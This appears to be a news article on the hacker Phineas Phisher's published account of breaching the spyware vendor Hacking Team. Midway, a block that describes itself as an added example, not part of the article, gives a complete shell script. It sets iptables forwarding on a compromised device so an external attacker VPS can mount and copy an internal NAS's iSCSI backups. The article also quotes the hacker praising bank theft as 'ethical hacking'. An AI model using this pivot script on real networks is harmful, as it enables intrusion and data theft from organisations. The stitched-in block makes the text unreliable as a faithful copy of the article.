Brian Klug

On Friday, the self-described black hat hacker who claimed responsibility for the Hacking Team dump last year, and who goes by the handle “Phineas Phisher,” published the technical details of how he pulled off the caper—and encouraged others to follow his example.
The apparently bilingual hacker originally published the details in Spanish—“just having some fun trolling the English speaking internet,” he posted on Reddit—but subsequently translated the document into English.
Private intelligence contractor Hacking Team develops and sells hacking tools to governments around the world, a practice many have questioned as enabling human rights violations.
“Hacking Team was a company that helped governments hack and spy on journalists, activists, political opposition, and other threats to their power,” Phisher wrote, accusing Hacking Team CEO David Vincenzetti of being a “fascist.”
“Companies like Hacking Team doing the state’s dirty work deserve to get owned and exposed,” he posted on Reddit.
Phisher is no script kiddie, whoever he is.
The attack he describes goes well beyond exploiting OWASP Top 10 vulnerabilities.
“The guy is kind of a ninja,” Dan Tentler, CEO of Phobos Group, which does attack simulation as a service, told Ars. “It’s pretty rare you find exploitation, reverse engineering, exploit development, lateral movement, networking/routing, and exfiltration all in the same person.”
How the hack went down
The hacker says that he discarded the idea of spear-phishing Hacking Team, writing that even though the technique is “responsible for the majority of hacks these days… I didn’t want to try to spear phish Hacking Team, as their whole business is helping governments spear phish their opponents, so they’d be much more likely to recognise and investigate a spear phishing attempt.”
To make things more challenging, Hacking Team appears to have secured their networks quite well. Unlike Gamma Group International, which the black hat also targeted (hence his Twitter handle @GammaGroupPR), Hacking Team did not expose much of an attack surface—only an up-to-date version of Joomla, “a mail server, a couple routers, two VPN appliances, and a spam filtering appliance.”
So, the hacker explains, three options presented themselves: “look for a zero-day in Joomla, look for a zero-day in postfix, or look for a zero-day in one of the embedded devices.”
“A zero-day in an embedded device seemed like the easiest option,” the hacker added, “and after two weeks of work reverse engineering, I got a remote root exploit.”
The hacker claims that he wrote backdoored firmware for the (unnamed) embedded device, and spent considerable time testing the backdoor to ensure that it would not cause system instability and prompt an employee to look more closely at the device.
Once inside, the hacker says he took a slow look around, and discovered an insecure MongoDB install, which he took the time to slag off in his pastebin post, writing “NoSQL, or rather NoAuthentication, has been a huge gift to the hacker community. Just when I was worried that they’d finally patched all of the authentication bypass bugs in MySQL, new databases came into style that lack authentication by design.”
But, according to the hacker, it was Hacking Team’s backups that proved the company’s undoing.
The company’s iSCSI backup storage was reachable on the internal subnet; by forwarding traffic through the compromised embedded device, the hacker mounted it from an external VPS he controlled.
“There were two distinct things this guy did that were impressive,” Tentler said. “1) writing a zero-day for an embedded Linux device, and 2) some very tricky networking and iptables rules to remotely mount an iSCSI device, through the compromised embedded device, so that some virtual machine he had out on the Internet could read data on a NAS.”
“That second item,” Tentler added, “that’s what got him access to backups—and in those backups he found the BES and admin credentials, and those credentials were a domain admin—so as soon as he found that out, it was game over. He was domain admin on their network.”
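One way to build the kind of pivot Tentler describes, written here as an added example rather than code from the Ars article or from Phisher’s own write-up. Every address, interface name, the forwarded port and the target IQN are assumed values; the script prints the commands instead of executing them unless it is run with DRY_RUN=0. The VPS side also handles the edge case that trips up a naive forward: the iSCSI SendTargets reply advertises the NAS by its internal address, so the initiator on the VPS needs its own DNAT rule to send that traffic back through the pivot.

```shell
#!/bin/sh
# Added example: forward iSCSI from an internal NAS, through a compromised
# Linux device, to an external VPS. Addresses, interfaces and IQN are assumed.
set -eu

DRY_RUN="${DRY_RUN:-1}"    # 1 = print the commands instead of executing them

# Execute a command, or just print it when DRY_RUN=1.
run() {
    if [ "$DRY_RUN" = 1 ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# --- Runs on the compromised embedded device (the pivot) ---
# $1 = attacker's VPS address (the only source allowed through the forward)
# $2 = internal iSCSI target (NAS) address
# $3 = port on the pivot's external interface that is forwarded to the NAS
# $4 = external interface, $5 = internal interface
pivot_rules() {
    vps=$1; nas=$2; lport=$3; wan=$4; lan=$5
    run sysctl -w net.ipv4.ip_forward=1
    # Rewrite traffic from the VPS arriving on $lport to the NAS's iSCSI port.
    run iptables -t nat -A PREROUTING -i "$wan" -s "$vps" -p tcp --dport "$lport" \
        -j DNAT --to-destination "$nas:3260"
    # Source-NAT so the NAS answers the pivot; on the LAN it looks like ordinary traffic.
    run iptables -t nat -A POSTROUTING -o "$lan" -d "$nas" -p tcp --dport 3260 -j MASQUERADE
    # Only the VPS may use the forward; FORWARD sees the post-DNAT destination.
    run iptables -A FORWARD -i "$wan" -o "$lan" -s "$vps" -d "$nas" -p tcp --dport 3260 -j ACCEPT
    run iptables -A FORWARD -i "$lan" -o "$wan" -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
}

# --- Runs on the VPS ---
# SendTargets returns the NAS's *internal* address, so iscsiadm would try to
# connect there directly and fail. An OUTPUT DNAT rule maps that address back
# to the pivot's forwarded port before discovery and login.
# $1 = pivot's external address, $2 = forwarded port, $3 = NAS internal address,
# $4 = target IQN, $5 = mount point
vps_mount() {
    pivot=$1; lport=$2; nas=$3; iqn=$4; mnt=$5
    run iptables -t nat -A OUTPUT -d "$nas" -p tcp --dport 3260 \
        -j DNAT --to-destination "$pivot:$lport"
    run iscsiadm -m discovery -t sendtargets -p "$pivot:$lport"
    run iscsiadm -m node -T "$iqn" -p "$nas:3260" --login
    run mkdir -p "$mnt"
    # Mount read-only: the goal is to copy backups, not to replay a journal or
    # update access times on the NAS. The by-path name assumes LUN 0.
    run mount -o ro,noatime "/dev/disk/by-path/ip-$nas:3260-iscsi-$iqn-lun-0" "$mnt"
}

# Constructed demo values; with DRY_RUN=1 this only prints what each side would run.
if [ "${PIVOT_DEMO:-1}" = 1 ]; then
    echo "# on the pivot"
    pivot_rules 203.0.113.5 192.168.200.66 33260 eth0 eth1
    echo "# on the VPS"
    vps_mount 198.51.100.10 33260 192.168.200.66 iqn.2000-01.com.example:backups /mnt/backups
fi
```

Two practical caveats: a stripped-down embedded kernel may lack the nat and conntrack modules these rules need, which is one reason Tentler calls the networking "tricky"; and the pivot's FORWARD rules restrict the hole to a single source address, so that the forward does not turn the NAS into something the whole Internet can reach.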
The hacker then apparently downloaded Hacking Team’s e-mail from their Exchange server.
But he was still missing the crown jewels—the company’s source code.
So Phisher went after Hacking Team’s sysadmin, Christian Pozzi, who apparently kept all his passwords in an encrypted TrueCrypt volume. “I waited until he’d mounted it,” Phisher wrote, “and then copied off the files.”
“That’s all it takes to take down a company and stop their human rights abuses,” Phisher wrote. “That’s the beauty and asymmetry of hacking: with 100 hours of work, one person can undo years of work by a multi-million dollar company. Hacking gives the underdog a chance to fight and win.”
A modern-day Robin Hood?
The hacker ended his technical analysis with a call to “hack back,” and proposed a concept of “ethical hacking” that could best be described as being a kind of modern-day Robin Hood:
Hacking guides often end with a disclaimer: this information is for educational purposes only, be an ethical hacker, don’t attack systems you don’t have permission to, etc.
I’ll say the same, but with a more rebellious conception of “ethical” hacking. Leaking documents, expropriating money from banks, and working to secure the computers of ordinary people is ethical hacking. However, most people that call themselves “ethical hackers” just work to secure those who pay their high consulting fees, who are often those most deserving to be hacked.
Regardless of whether Phineas Phisher is who he says he is—and not, say, a state actor—his call to action seems likely to provoke copycat hackers. The hacker initially agreed to answer a few questions for Ars, even though he’s usually “very distrustful of the media,” as he put it in an encrypted e-mail, but later changed his mind. We’ll update this story if he decides to respond.
Hacking Team’s Vincenzetti, in a Monday morning e-mail to his private e-mail list that has been seen by Ars, said that “multiple law enforcement investigations are underway in several countries. We hope that the vigilante’s barging [sic – bragging?] about his work will lead to his swift arrest and prosecution.”
Vincenzetti emphasised that Hacking Team are developing “new cutting-edge tools” and that they have “overhauled and secured internal computer networks.” He also cited “inaccuracies” in the hacker’s story, but did not specify what those might be.
This post originated on Ars Technica UK